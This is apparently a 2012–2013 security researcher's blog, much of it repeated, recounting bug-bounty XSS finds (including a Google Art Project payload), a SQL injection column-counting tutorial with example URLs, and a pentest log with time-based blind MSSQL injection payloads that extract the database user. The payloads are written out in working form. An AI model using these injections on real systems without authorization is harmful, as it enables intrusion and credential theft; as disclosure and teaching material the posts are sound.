Yes. I'm in Google Hall of Fame..finally!
Thanks !
Friday, January 18, 2013
Wednesday, January 16, 2013
XSS in Google Art Project
Hi everyone.
This will be my 1st post for 2013. Hope it still not too late to wish you guys a Happy New Year. Hope you all live happily besides your love one :D
Few weeks ago, I found an XSS in one of the Google website, which is www.googleartprojects.com.
The vulnerable part found in the search box. Tested the inpur validation and checked the source page,
hmmmm???? Looks quite promising. Just testing my luck using a simple XSS payload
x”</title><img src%3dx onerror%3dalert(1)>
and..
My 1st XSS found in Google Inc!
Immediately made a POC report and submit it to google security team.
Days after submitted the report, I tried to google around about this website and found that there's already a report made by @NightRang3r (Mr Shai Rod) previously on this website. He found a stored XSS in it.
That's all.
Thanks
@yappare
This will be my 1st post for 2013. Hope it still not too late to wish you guys a Happy New Year. Hope you all live happily besides your love one :D
Few weeks ago, I found an XSS in one of the Google website, which is www.googleartprojects.com.
The vulnerable part found in the search box. Tested the inpur validation and checked the source page,
hmmmm???? Looks quite promising. Just testing my luck using a simple XSS payload
x”</title><img src%3dx onerror%3dalert(1)>
and..
BOOM! its executed
My 1st XSS found in Google Inc!
Immediately made a POC report and submit it to google security team.
They received my report on Jan 7 2013.
And received this email early in the morning (different timezone -___-")
And, I'll be in the Google Hall of Fame in a next few days! Congratz to myself.
Then, I tried around to test more on it. And found that, there's a stored XSS as well in it!
BUT, unfortunately, because of my 1st report, my next report on the same website had been clarified as dupelicate -___-"
Days after submitted the report, I tried to google around about this website and found that there's already a report made by @NightRang3r (Mr Shai Rod) previously on this website. He found a stored XSS in it.
That's all.
Thanks
@yappare
Friday, December 7, 2012
Paypal Bug Bounty, Paid!
After a few months of waiting..it worth!
4 bugs submitted. 3 had been told duplicate. 1 still fresh. And this is what i got!
Thanks Paypal!
Thanks Paypal!
Wednesday, November 28, 2012
Phoca Guestbook XSS
Found XSS and possibly a permanent and blind XSS.
Reported to the right person and they came out with an updated version to fix that issue.
Get the updated version here
Step to produce the bug :
Reported to the right person and they came out with an updated version to fix that issue.
Step to produce the bug :
Complete the message/comment box. Each forms are vulnerable to XSS.
XSS payload is successfully stored. If the comment/message need a validation from admin, we can use direct payload to get the admin cookies which this attack known as Blind XSS.
Date reported : 25/10/2012
Date fixed : 21/11/2012
Date published: 29/11/2012
Thanks,
@yappare
Friday, November 23, 2012
Listed in RedHat Acknowledgements
@yappare
Tuesday, November 20, 2012
Counting Columns in SQLi
Hi there.
As we already know,the most common way to count number of columns in SQL Injection attack is via order by query.
Example as below
Unknown column '6' in 'order clause'
From here we know that the number of column exist is 5 and can proceed with SQLi.
But,if you encounter a scenario where you cant use order by because of the WAF or any reason related,there are still some ways to count it.
1 - Use group by query
Similar to order by technique.but instead using order by, we use GROUP BY
Unknown column '6' in 'group statement'
another way is using
2 - Set the condition such as ( the main query ) = (select 1)
As example,
and the error message will shows the number of column such as this message
Operand should contain 5 column(s)
Thanks,
@yappare a.k.a p0pc0rn
As we already know,the most common way to count number of columns in SQL Injection attack is via order by query.
Example as below
http://example.org/news.php?id=8 order by 5--
http://example.org/news.php?id=8 order by 6--
Unknown column '6' in 'order clause'
From here we know that the number of column exist is 5 and can proceed with SQLi.
http://example.org/news.php?id=-8 union select 1,2,3,4,5--
But,if you encounter a scenario where you cant use order by because of the WAF or any reason related,there are still some ways to count it.
1 - Use group by query
Similar to order by technique.but instead using order by, we use GROUP BY
http://example.org/news.php?id=8 group by 5--
http://example.org/news.php?id=8 group by 6--
Unknown column '6' in 'group statement'
another way is using
2 - Set the condition such as ( the main query ) = (select 1)
As example,
http://example.org/news.php?id=8 and (select * from news)=(select 1)
and the error message will shows the number of column such as this message
Operand should contain 5 column(s)
Thanks,
@yappare a.k.a p0pc0rn
Monday, November 19, 2012
VKDownloader V2
Remember the 1st vkdownloader python script? Look at here http://c0rni3sm.blogspot.com/2012/01/vkdownloader-python-script.html
..quite messy. I'm not good in programming actually.still learning from basic..the old version wont work anymore,a little modification is needed and here I share with you all the 2nd version of VKDownloader.
How to use? Just like the old one :)
1 - need a python in your PC
2 - copy the video code
3 - run it using command python vkdownloader_v2.py "url code"
or simply get it here http://pastebin.com/K3ht0Bc7
..quite messy. I'm not good in programming actually.still learning from basic..the old version wont work anymore,a little modification is needed and here I share with you all the 2nd version of VKDownloader.
How to use? Just like the old one :)
1 - need a python in your PC
2 - copy the video code
3 - run it using command python vkdownloader_v2.py "url code"
#!/usr/bin/python
import sys, re, urllib2
if len(sys.argv) < 2:
print """
## Usage : python vkdownloader_v2.py "Url" ##
-------------------------------------------------------------------------------------------
Example :
python vkdownloader_v2.py "http://vk.com/video_ext.php?oid=1111111&id=2222222&hash=4333333"
-------------------------------------------------------------------------------------------
## VK Downloader V2 by p0pc0rn 2012 ##
"""
sys.exit(0)
url = sys.argv[1]
url2 = sys.argv[1]
url3 = sys.argv[1]
find = re.compile("var video_host = '(.*?)';")
find2 = re.compile("var video_uid = '(.*?)';")
find3 = re.compile("var video_vtag = '(.*?)';")
data = urllib2.urlopen(url).read()
data2 = urllib2.urlopen(url2).read()
data3 = urllib2.urlopen(url3).read()
result = find.search(data)
str = result.group(1)
data2 = urllib2.urlopen(url2).read()
data3 = urllib2.urlopen(url3).read()
result2 = find2.search(data2)
result3 = find3.search(data3)
print 'Download link for 360p => ' + str.replace("userapi.com", "vk.com") +'u'+result2.group(1)+'/videos/'+ result3.group(1)+'.360.mp4'
print 'Download link for 360p => ' + str.replace("userapi.com", "vk.com") +'u'+result2.group(1)+'/videos/'+ result3.group(1)+'.480.mp4'
print 'Download link for 360p => ' + str.replace("userapi.com", "vk.com") +'u'+result2.group(1)+'/videos/'+ result3.group(1)+'.720.mp4'
or simply get it here http://pastebin.com/K3ht0Bc7
Friday, November 9, 2012
Listed in eBay Security Reseacher
Located at their page here http://pages.ebay.com/securitycenter/ResearchersAcknowledgement.html
Thank you eBay Security Team.
:D
@yappare.
:D
@yappare.
Tuesday, October 23, 2012
MySQL Blind Time Based Technique
O hye everyone! seems my blog full with XSS collections nowdays and yeah..some of you might not interest in these stuff since its quite childish..but well..i'm too lazy to update my blog LOL.
But today,I felt guilty for my blog and here you go..another experience with my client for their client/server application.
Remember this Blind Oracle Injection in client/server on my previous previous preeeeviiiiooouussss post? haha. well this time, few weeks ago, I had instructed by boss to do a pentest on one of the client's application.
The application using java servlet environment as well, a client/server application. Well, this time I cant use my own computer. Need to use their development testing computer. Without any internet connection, it quite tough for me to gain some information from the internet.
Browsing a little on the application. Checking how it works..hurmm..nothing interesting..just a simple client/server application but quite complicated module such the previous I did tested..
hmmm..ouh?! suddenly..
there's a search box where I can try to search a valid customer by entering their name...ahaa..this quite interesting..its similar to the previous thing I found.
I tried to check a valid user.
ahaa..ahaa..its appear..
then..with the power of single quote!
woops!!! OMG! OMG! OMG!..haha..so there's a probability SQL Injection on it! owh how lucky.
but since there are some limitation on it. I tried to count columns,its available but using a union based method wont successfull. hurmm..
what is should do? ah.go for lunch first :D
during my lunch, I tried to browse some good information on SQLi. owh yeah, since I already know the backend of the server is running on SQL Server, this will narrow up my point of search.
here are some of my reference
http://technet.microsoft.com/en-us/library/cc512676.aspx
and of course the greatest cheatsheet, http://pentestmonkey.net/category/cheat-sheet
back from lunch!
Trying my luck!
* the server will not wait a 10 secs delay since the length of the current user is not 7 chars.
* the server will wait a 10 secs delay since the length of the current user is exactly 8 chars.
then proceeding to check the current user in case the client need another POC.
and no need to proceed anymore since already can guess the current user is j2eejdb
and then,trying my luck using the username as the password as well to connect to the sql server.
gotcha! I'm in it!
thanks for reading :)
p/s boss.if you're reading this..please..dont let me struggling with this client/server application anymore..pleaaseeeee.hahahaa..but,I'll do if there's a..*cough2..increment or..*cough2.bonus..*cough :P
But today,I felt guilty for my blog and here you go..another experience with my client for their client/server application.
Remember this Blind Oracle Injection in client/server on my previous previous preeeeviiiiooouussss post? haha. well this time, few weeks ago, I had instructed by boss to do a pentest on one of the client's application.
The application using java servlet environment as well, a client/server application. Well, this time I cant use my own computer. Need to use their development testing computer. Without any internet connection, it quite tough for me to gain some information from the internet.
Browsing a little on the application. Checking how it works..hurmm..nothing interesting..just a simple client/server application but quite complicated module such the previous I did tested..
hmmm..ouh?! suddenly..
there's a search box where I can try to search a valid customer by entering their name...ahaa..this quite interesting..its similar to the previous thing I found.
I tried to check a valid user.
ahaa..ahaa..its appear..
then..with the power of single quote!
woops!!! OMG! OMG! OMG!..haha..so there's a probability SQL Injection on it! owh how lucky.
but since there are some limitation on it. I tried to count columns,its available but using a union based method wont successfull. hurmm..
what is should do? ah.go for lunch first :D
during my lunch, I tried to browse some good information on SQLi. owh yeah, since I already know the backend of the server is running on SQL Server, this will narrow up my point of search.
here are some of my reference
http://technet.microsoft.com/en-us/library/cc512676.aspx
and of course the greatest cheatsheet, http://pentestmonkey.net/category/cheat-sheet
back from lunch!
Trying my luck!
it gives a FALSE reply.bazinga; 1' IF (LEN(USER)=7) WAITFOR DELAY '0:0:10'--
* the server will not wait a 10 secs delay since the length of the current user is not 7 chars.
bazinga; 1' IF (LEN(USER)=8) WAITFOR DELAY '0:0:10'--auw yeah..a TRUE reply
* the server will wait a 10 secs delay since the length of the current user is exactly 8 chars.
then proceeding to check the current user in case the client need another POC.
its Jbazinga; 1' IF (ASCII(lower(substring((USER),1,1)))>105) WAITFOR DELAY '0:0:10'--
its 2bazinga; 1' IF (ASCII(lower(substring((USER),2,1)))>49) WAITFOR DELAY '0:0:5'--
its Ebazinga; 1' IF (ASCII(lower(substring((USER),3,1)))>101) WAITFOR DELAY '0:0:5'--
its Ebazinga; 1' IF (ASCII(lower(substring((USER),4,1)))>101) WAITFOR DELAY '0:0:5'--
its another Jbazinga; 1' IF (ASCII(lower(substring((USER),5,1)))>106) WAITFOR DELAY '0:0:5'--
and no need to proceed anymore since already can guess the current user is j2eejdb
and then,trying my luck using the username as the password as well to connect to the sql server.
gotcha! I'm in it!
thanks for reading :)
p/s boss.if you're reading this..please..dont let me struggling with this client/server application anymore..pleaaseeeee.hahahaa..but,I'll do if there's a..*cough2..increment or..*cough2.bonus..*cough :P
Sunday, October 21, 2012
XSS on Airlines.
These are two XSS had been found last few months. Reported but no feedback from them.
Emirates Airlines
Malaysia Airlines
Sunday, October 14, 2012
iHack+ 2012 - Hacking Competition
Are you a student from any local university in Malaysia? if Yes, come and join this hacking competition!
a Hacking Competition organized by UiTM for students in Malaysia.
for more info Click Here
RM80,000 awaits you all!!
for more info Click Here
RM80,000 awaits you all!!